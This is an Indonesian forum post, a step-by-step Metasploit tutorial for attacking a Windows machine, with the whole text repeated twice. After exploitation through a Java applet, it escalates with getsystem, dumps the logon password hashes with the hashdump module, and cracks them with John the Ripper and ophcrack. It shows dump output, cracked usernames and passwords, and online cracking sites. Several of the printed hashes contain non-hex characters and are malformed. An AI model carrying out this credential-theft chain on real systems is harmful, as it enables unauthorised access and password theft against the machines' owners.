01-30-2014, 05:22 AM
bikin tutorial dikit nih tentang metasploit.
target atau victim nya adalah windows.
saya mau jelasin dikit cara main metasploit dari mulai start sampai cracking password untuk logon windows nya.
tools:
$ metasploit (linux atau windows)
$ ophcrack (linux atau windows)
pertama ( exploitasi ke target )
. disini kita asumsikan si attacker dgn ip 127.0.0.1 dan si target dgn ip 192.168.1.1
. untuk exploitnya silahkan eksplorasi sendiri :p
. di tutorial ini saya pakai exploit java applet .
kedua
. kalo udah dapat akses meterpreternya,, pindah ke proses yg sedang dijalankan oleh system,, supaya kalo si target matiin proses yg dijalankan oleh meterpreter,, akses meterpreternya gak hilang,, soalnya gak mungkin kan kalo si target matiin proses yg sedang dijalankan oleh system
biar cepet langsung ketik perintahnya "getsystem" ..
trus kita simpen dulu akses meterpreternya dgn perintah "background" karna pada langkah selanjutnya ada yg gak bisa dijalanin di meterpreter ..
ketiga
. dalam proses ini kita akan ngedump user & hash password logon windows nya
module yg dipake untuk ngedump nya adalah "post/windows/gather/hashdump" ..
lalu set sesi meterpreternya,, di tutor ini sesi meterpreternya 1 ..
kalo bingung liat di gambar 2 ..
jadi perintahnya "set session 1" ,, slanjutnya tinggal dijalanin module nya dgn perintah "run" ..
[*] Dumping password hashes...
Administrator:500:8d0eb0a305da8fd5bb043e5y88738b81d8:294f1f96434b3402710c172171982231:::
Guest:501:37c3437ff2f2eefaaad3b435b51404ee:f83de535df975268b0283922d1564d52:::
ASPNET:1007:a6cc0c674918ca2941948d65050505627c9:1bb102f15b28b0f32b10505a0f70bdea:::
sempak:1008:2ae390f569cf378e73251aagiuy8314b90:44561a7c98addf40b0a7b2c32093a116:::
mimin:1009:917efeade9775c6a900e5ec26egrwg931a:5141a9107fe59sfdadf9f68fde848cf6:::
becek:1017:e01042e8858a71b9f3fkajfn10ac0594f1a:ffc71435sjah9aac558768829d7e98e2d:::
nah itu yg tulisannya bisa kebaca itu adalah usernya (ex: Administrator)
dan passwornya itu 8d0eb0a305da8fd5bb042a88738b81d8:294f1f96434b3402710c172171982231 yg masih dalam bentuk hash LM & NT
keempat
. skarang kita akan crack passwordnya dgn John The Ripper (JTR),,
module yg dipake adalah "auxiliary/analyze/jtr_crack_fast" ,, jalanin modulnya dgn perintah "run" ..
kelima
. lanjutan dari gambar 4,, ternyata yg berhasil di crack cuman 3 user doang :v
[+] Cracked: sempak:bolong01 (192.168.1.1:445)
[+] Cracked: mimin:\delete (192.168.1.1:445)
[+] Cracked: becek:\delete (192.168.1.1:445)
[*] Auxiliary module execution completed
msf auxiliary(jtr_crack_fast) >
usernya ==> sempak passwordnya ==> bolong01
disini bisa kita liat kalo gak smuanya bisa dilakuin sama metasploit,, ya sama kayak manusia lah (nobody perfect) wkwkwkwk
)
terakhir
. nah disni saatnya kita gunakan tools ophcrack
tapi disini yg mau kita coba crack adalah user ASPNET,,
dan hasil crack nyaa adalah:
user: ASPNET
pass: c^4GI40X1&c*R7
bisa kita liat dari kombinasi passwordnya rumit banget, tapi berhasil di crack pake ophcrack dgn durasi cracking nya slama 28mnit 7 detik.
spek pc yg saya pake:
Intel Core Duo,, CPU E4600 @2.40GHz 2.39GHz ,, RAM 2 GB
lama proses cracking tergantung dari spek kompi yg ngecrack nya,, dan tergantung dari wordlist yg ada di ophcrack nya juga.
untuk cracking online bisa di https://crackstation.net/ ,, http://cracker.offensive-security.com/index.php ,, sisanya cari sndiri.
sekian tutor dari saya, smoga bermanfaat
target atau victim nya adalah windows.
saya mau jelasin dikit cara main metasploit dari mulai start sampai cracking password untuk logon windows nya.
tools:
$ metasploit (linux atau windows)
$ ophcrack (linux atau windows)
pertama ( exploitasi ke target )
. disini kita asumsikan si attacker dgn ip 127.0.0.1 dan si target dgn ip 192.168.1.1
. untuk exploitnya silahkan eksplorasi sendiri :p
. di tutorial ini saya pakai exploit java applet .
Spoiler! :
![[Image: 1557453_738020826230958_1062859694_n.jpg]](https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-prn2/t1/s720x720/1557453_738020826230958_1062859694_n.jpg)
kedua
. kalo udah dapat akses meterpreternya,, pindah ke proses yg sedang dijalankan oleh system,, supaya kalo si target matiin proses yg dijalankan oleh meterpreter,, akses meterpreternya gak hilang,, soalnya gak mungkin kan kalo si target matiin proses yg sedang dijalankan oleh system
biar cepet langsung ketik perintahnya "getsystem" ..
trus kita simpen dulu akses meterpreternya dgn perintah "background" karna pada langkah selanjutnya ada yg gak bisa dijalanin di meterpreter ..
Spoiler! :
![[Image: 1724628_738020886230952_1090747902_n.jpg]](https://scontent-b.xx.fbcdn.net/hphotos-prn2/t1/s720x720/1724628_738020886230952_1090747902_n.jpg)
ketiga
. dalam proses ini kita akan ngedump user & hash password logon windows nya
module yg dipake untuk ngedump nya adalah "post/windows/gather/hashdump" ..
lalu set sesi meterpreternya,, di tutor ini sesi meterpreternya 1 ..
kalo bingung liat di gambar 2 ..
jadi perintahnya "set session 1" ,, slanjutnya tinggal dijalanin module nya dgn perintah "run" ..
[*] Dumping password hashes...
Administrator:500:8d0eb0a305da8fd5bb043e5y88738b81d8:294f1f96434b3402710c172171982231:::
Guest:501:37c3437ff2f2eefaaad3b435b51404ee:f83de535df975268b0283922d1564d52:::
ASPNET:1007:a6cc0c674918ca2941948d65050505627c9:1bb102f15b28b0f32b10505a0f70bdea:::
sempak:1008:2ae390f569cf378e73251aagiuy8314b90:44561a7c98addf40b0a7b2c32093a116:::
mimin:1009:917efeade9775c6a900e5ec26egrwg931a:5141a9107fe59sfdadf9f68fde848cf6:::
becek:1017:e01042e8858a71b9f3fkajfn10ac0594f1a:ffc71435sjah9aac558768829d7e98e2d:::
nah itu yg tulisannya bisa kebaca itu adalah usernya (ex: Administrator)
dan passwornya itu 8d0eb0a305da8fd5bb042a88738b81d8:294f1f96434b3402710c172171982231 yg masih dalam bentuk hash LM & NT
Spoiler! :
![[Image: 1622651_738020939564280_1593029582_n.jpg]](https://scontent-a.xx.fbcdn.net/hphotos-ash3/s720x720/1622651_738020939564280_1593029582_n.jpg)
keempat
. skarang kita akan crack passwordnya dgn John The Ripper (JTR),,
module yg dipake adalah "auxiliary/analyze/jtr_crack_fast" ,, jalanin modulnya dgn perintah "run" ..
Spoiler! :
![[Image: 1623641_738021002897607_1525366656_n.jpg]](https://scontent-a.xx.fbcdn.net/hphotos-prn1/s720x720/1623641_738021002897607_1525366656_n.jpg)
kelima
. lanjutan dari gambar 4,, ternyata yg berhasil di crack cuman 3 user doang :v
[+] Cracked: sempak:bolong01 (192.168.1.1:445)
[+] Cracked: mimin:\delete (192.168.1.1:445)
[+] Cracked: becek:\delete (192.168.1.1:445)
[*] Auxiliary module execution completed
msf auxiliary(jtr_crack_fast) >
usernya ==> sempak passwordnya ==> bolong01
disini bisa kita liat kalo gak smuanya bisa dilakuin sama metasploit,, ya sama kayak manusia lah (nobody perfect) wkwkwkwk
)Spoiler! :
![[Image: 5739_738021049564269_1418738957_n.jpg]](https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash3/t1/s720x720/5739_738021049564269_1418738957_n.jpg)
terakhir
. nah disni saatnya kita gunakan tools ophcrack
Spoiler! :
![[Image: 1604868_738021142897593_1128320441_n.jpg]](https://scontent-b.xx.fbcdn.net/hphotos-frc3/t1/s720x720/1604868_738021142897593_1128320441_n.jpg)
dan hasil crack nyaa adalah:
user: ASPNET
pass: c^4GI40X1&c*R7
bisa kita liat dari kombinasi passwordnya rumit banget, tapi berhasil di crack pake ophcrack dgn durasi cracking nya slama 28mnit 7 detik.
spek pc yg saya pake:
Intel Core Duo,, CPU E4600 @2.40GHz 2.39GHz ,, RAM 2 GB
lama proses cracking tergantung dari spek kompi yg ngecrack nya,, dan tergantung dari wordlist yg ada di ophcrack nya juga.
untuk cracking online bisa di https://crackstation.net/ ,, http://cracker.offensive-security.com/index.php ,, sisanya cari sndiri.
sekian tutor dari saya, smoga bermanfaat
